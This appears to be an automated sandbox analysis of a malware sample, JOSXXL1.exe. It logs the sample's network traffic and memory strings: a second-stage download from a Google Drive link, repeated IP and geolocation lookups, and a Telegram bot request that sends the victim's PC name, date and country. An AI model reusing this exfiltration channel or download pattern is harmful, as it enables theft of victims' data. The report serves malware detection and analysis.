Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1TQCyESnrOdUT1AguOSyvjh_GMhxmIcz2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1TQCyESnrOdUT1AguOSyvjh_GMhxmIcz2&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:447849%0D%0ADate%20and%20Time:%2027/10/2024%20/%2006:11:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20447849%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 26 Oct 2024 21:57:32 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: JOSXXL1.exe, 00000004.00000003.2471629134.0000000007036000.00000004.00000020.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000003.2418443538.0000000007036000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://microsoft.coj
Source: JOSXXL1.exe, 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmp, JOSXXL1.exe, 00000000.00000000.1674444309.000000000040A000.00000008.00000001.01000000.00000003.sdmp, JOSXXL1.exe, 00000004.00000000.2315337300.000000000040A000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: JOSXXL1.exe, 00000004.00000003.2471629134.0000000007036000.00000004.00000020.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000003.2418443538.0000000007036000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: JOSXXL1.exe, 00000004.00000002.2972706874.0000000038717000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: JOSXXL1.exe, 00000004.00000002.2971397294.0000000037531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: JOSXXL1.exe, 00000004.00000002.2971397294.0000000037531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: JOSXXL1.exe, 00000004.00000002.2971397294.0000000037531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: JOSXXL1.exe, 00000004.00000002.2971397294.0000000037531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:447849%0D%0ADate%20a
Source: JOSXXL1.exe, 00000004.00000003.2418443538.0000000007036000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: JOSXXL1.exe, 00000004.00000002.2972706874.0000000038717000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: JOSXXL1.exe, 00000004.00000002.2972706874.0000000038717000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: JOSXXL1.exe, 00000004.00000002.2972706874.0000000038717000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: JOSXXL1.exe, 00000004.00000002.2971397294.000000003760E000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2971397294.000000003763F000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2971397294.0000000037555000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: JOSXXL1.exe, 00000004.00000002.2971397294.0000000037609000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlBkq
Source: JOSXXL1.exe, 00000004.00000002.2943116609.0000000006FC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: JOSXXL1.exe, 00000004.00000002.2943116609.0000000006FC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/a
Source: JOSXXL1.exe, 00000004.00000002.2943553869.00000000089C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TQCyESnrOdUT1AguOSyvjh_GMhxmIcz2
Source: JOSXXL1.exe, 00000004.00000003.2471464803.0000000007070000.00000004.00000020.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2943116609.000000000702F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: JOSXXL1.exe, 00000004.00000003.2471629134.0000000007036000.00000004.00000020.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2943116609.000000000702F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/1
Source: JOSXXL1.exe, 00000004.00000003.2471629134.0000000007036000.00000004.00000020.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000003.2418443538.0000000007036000.00000004.00000020.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2943116609.000000000701D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1TQCyESnrOdUT1AguOSyvjh_GMhxmIcz2&export=download
Source: JOSXXL1.exe, 00000004.00000003.2471629134.0000000007036000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1TQCyESnrOdUT1AguOSyvjh_GMhxmIcz2&export=downloads-
Source: JOSXXL1.exe, 00000004.00000002.2972706874.0000000038717000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: JOSXXL1.exe, 00000004.00000002.2972706874.0000000038717000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: JOSXXL1.exe, 00000004.00000002.2972706874.0000000038717000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: JOSXXL1.exe, 00000004.00000002.2971397294.0000000037531000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2971397294.000000003749B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: JOSXXL1.exe, 00000004.00000002.2971397294.000000003749B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: JOSXXL1.exe, 00000004.00000002.2971397294.000000003749B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.68
Source: JOSXXL1.exe, 00000004.00000002.2971397294.00000000374C5000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2971397294.000000003750B000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2971397294.0000000037531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.68$
Source: JOSXXL1.exe, 00000004.00000003.2418443538.0000000007036000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: JOSXXL1.exe, 00000004.00000002.2972706874.0000000038573000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.0000000038717000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.00000000386C9000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2971397294.0000000037555000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.0000000038525000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.000000003859A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: JOSXXL1.exe, 00000004.00000002.2972706874.00000000386CF000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.0000000038500000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.00000000387A7000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.0000000038575000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.000000003852B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: JOSXXL1.exe, 00000004.00000002.2972706874.0000000038573000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.0000000038717000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.00000000386C9000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2971397294.0000000037555000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.0000000038525000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.000000003859A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: JOSXXL1.exe, 00000004.00000002.2972706874.00000000386CF000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.0000000038500000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.00000000387A7000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.0000000038575000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.000000003852B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: JOSXXL1.exe, 00000004.00000002.2972706874.0000000038717000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: JOSXXL1.exe, 00000004.00000003.2418443538.0000000007036000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: JOSXXL1.exe, 00000004.00000003.2418443538.0000000007036000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: JOSXXL1.exe, 00000004.00000002.2972706874.0000000038717000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: JOSXXL1.exe, 00000004.00000003.2418443538.0000000007036000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: JOSXXL1.exe, 00000004.00000003.2418443538.0000000007036000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: JOSXXL1.exe, 00000004.00000002.2971397294.000000003763F000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2971397294.0000000037555000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: JOSXXL1.exe, 00000004.00000002.2971397294.000000003763A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lBkq

Source: unknown	Network traffic detected: HTTP traffic on port 61902 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61964
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61922
Source: unknown	Network traffic detected: HTTP traffic on port 61854 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61945
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61902
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61847
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61981
Source: unknown	Network traffic detected: HTTP traffic on port 61976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61913 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61952
Source: unknown	Network traffic detected: HTTP traffic on port 61964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61976
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61933
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61913
Source: unknown	Network traffic detected: HTTP traffic on port 61922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61896

Source: unknown	HTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.4:61847 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.4:61854 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:61981 version: TLS 1.2

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\JOSXXL1.exe

Code function: 0_2_00405421 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405421

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 0_2_004033B6 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_004033B6
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_004033B6 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		4_2_004033B6

Detected potential crypto function

Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 0_2_00406847	0_2_00406847
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 0_2_00404C5E	0_2_00404C5E
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_00406847	4_2_00406847
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_00404C5E	4_2_00404C5E
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_0015C19B	4_2_0015C19B
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_0015D278	4_2_0015D278
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_00155362	4_2_00155362
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_0015C468	4_2_0015C468
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_0015C738	4_2_0015C738
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_0015E988	4_2_0015E988
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_001569A0	4_2_001569A0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_001529E0	4_2_001529E0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_0015CA08	4_2_0015CA08
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_0015CCD8	4_2_0015CCD8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_00159DE0	4_2_00159DE0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_0015CFAC	4_2_0015CFAC
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_00156FC8	4_2_00156FC8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_0015E97C	4_2_0015E97C
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_0015F961	4_2_0015F961
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_00153E09	4_2_00153E09
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39692968	4_2_39692968
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39699548	4_2_39699548
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969FC68	4_2_3969FC68
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39695028	4_2_39695028
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_396917A0	4_2_396917A0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39691E80	4_2_39691E80
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969D540	4_2_3969D540
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969D550	4_2_3969D550
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969DDFF	4_2_3969DDFF
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969DDF1	4_2_3969DDF1
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969D9A8	4_2_3969D9A8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969D999	4_2_3969D999
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39690040	4_2_39690040
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969F802	4_2_3969F802
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39690006	4_2_39690006
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39699C18	4_2_39699C18
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39695018	4_2_39695018
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969F810	4_2_3969F810
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969D0F8	4_2_3969D0F8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969CCA0	4_2_3969CCA0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969EF60	4_2_3969EF60
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969EF51	4_2_3969EF51
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39690B20	4_2_39690B20
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39690B30	4_2_39690B30
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969EB08	4_2_3969EB08
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39698BA0	4_2_39698BA0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969F3B8	4_2_3969F3B8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969178F	4_2_3969178F
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39691E70	4_2_39691E70
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969E24A	4_2_3969E24A
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969E258	4_2_3969E258
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969DE00	4_2_3969DE00
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969EAF8	4_2_3969EAF8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969E6AF	4_2_3969E6AF
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969E6A0	4_2_3969E6A0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969E6B0	4_2_3969E6B0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D781D0	4_2_39D781D0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D78FB0	4_2_39D78FB0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D77B78	4_2_39D77B78
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D76030	4_2_39D76030
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7E9D8	4_2_39D7E9D8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D75BD8	4_2_39D75BD8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7C9D8	4_2_39D7C9D8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7E9C8	4_2_39D7E9C8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D72FF9	4_2_39D72FF9
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D715F8	4_2_39D715F8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7C9E8	4_2_39D7C9E8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D715E8	4_2_39D715E8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7D798	4_2_39D7D798
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7B798	4_2_39D7B798
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7D787	4_2_39D7D787
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D75780	4_2_39D75780
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7F788	4_2_39D7F788
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D72BB0	4_2_39D72BB0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D78FA1	4_2_39D78FA1
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D711A0	4_2_39D711A0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D72BA0	4_2_39D72BA0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D72BAF	4_2_39D72BAF
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D781AA	4_2_39D781AA
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7B7A8	4_2_39D7B7A8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7C558	4_2_39D7C558
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D72758	4_2_39D72758
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D72749	4_2_39D72749
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D70D48	4_2_39D70D48
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7E548	4_2_39D7E548
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7C548	4_2_39D7C548
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D77B77	4_2_39D77B77
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7F778	4_2_39D7F778
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D77B69	4_2_39D77B69
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7531A	4_2_39D7531A
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7B318	4_2_39D7B318
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7B307	4_2_39D7B307
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D72300	4_2_39D72300
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7D308	4_2_39D7D308
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7A938	4_2_39D7A938
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7E538	4_2_39D7E538
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D77722	4_2_39D77722
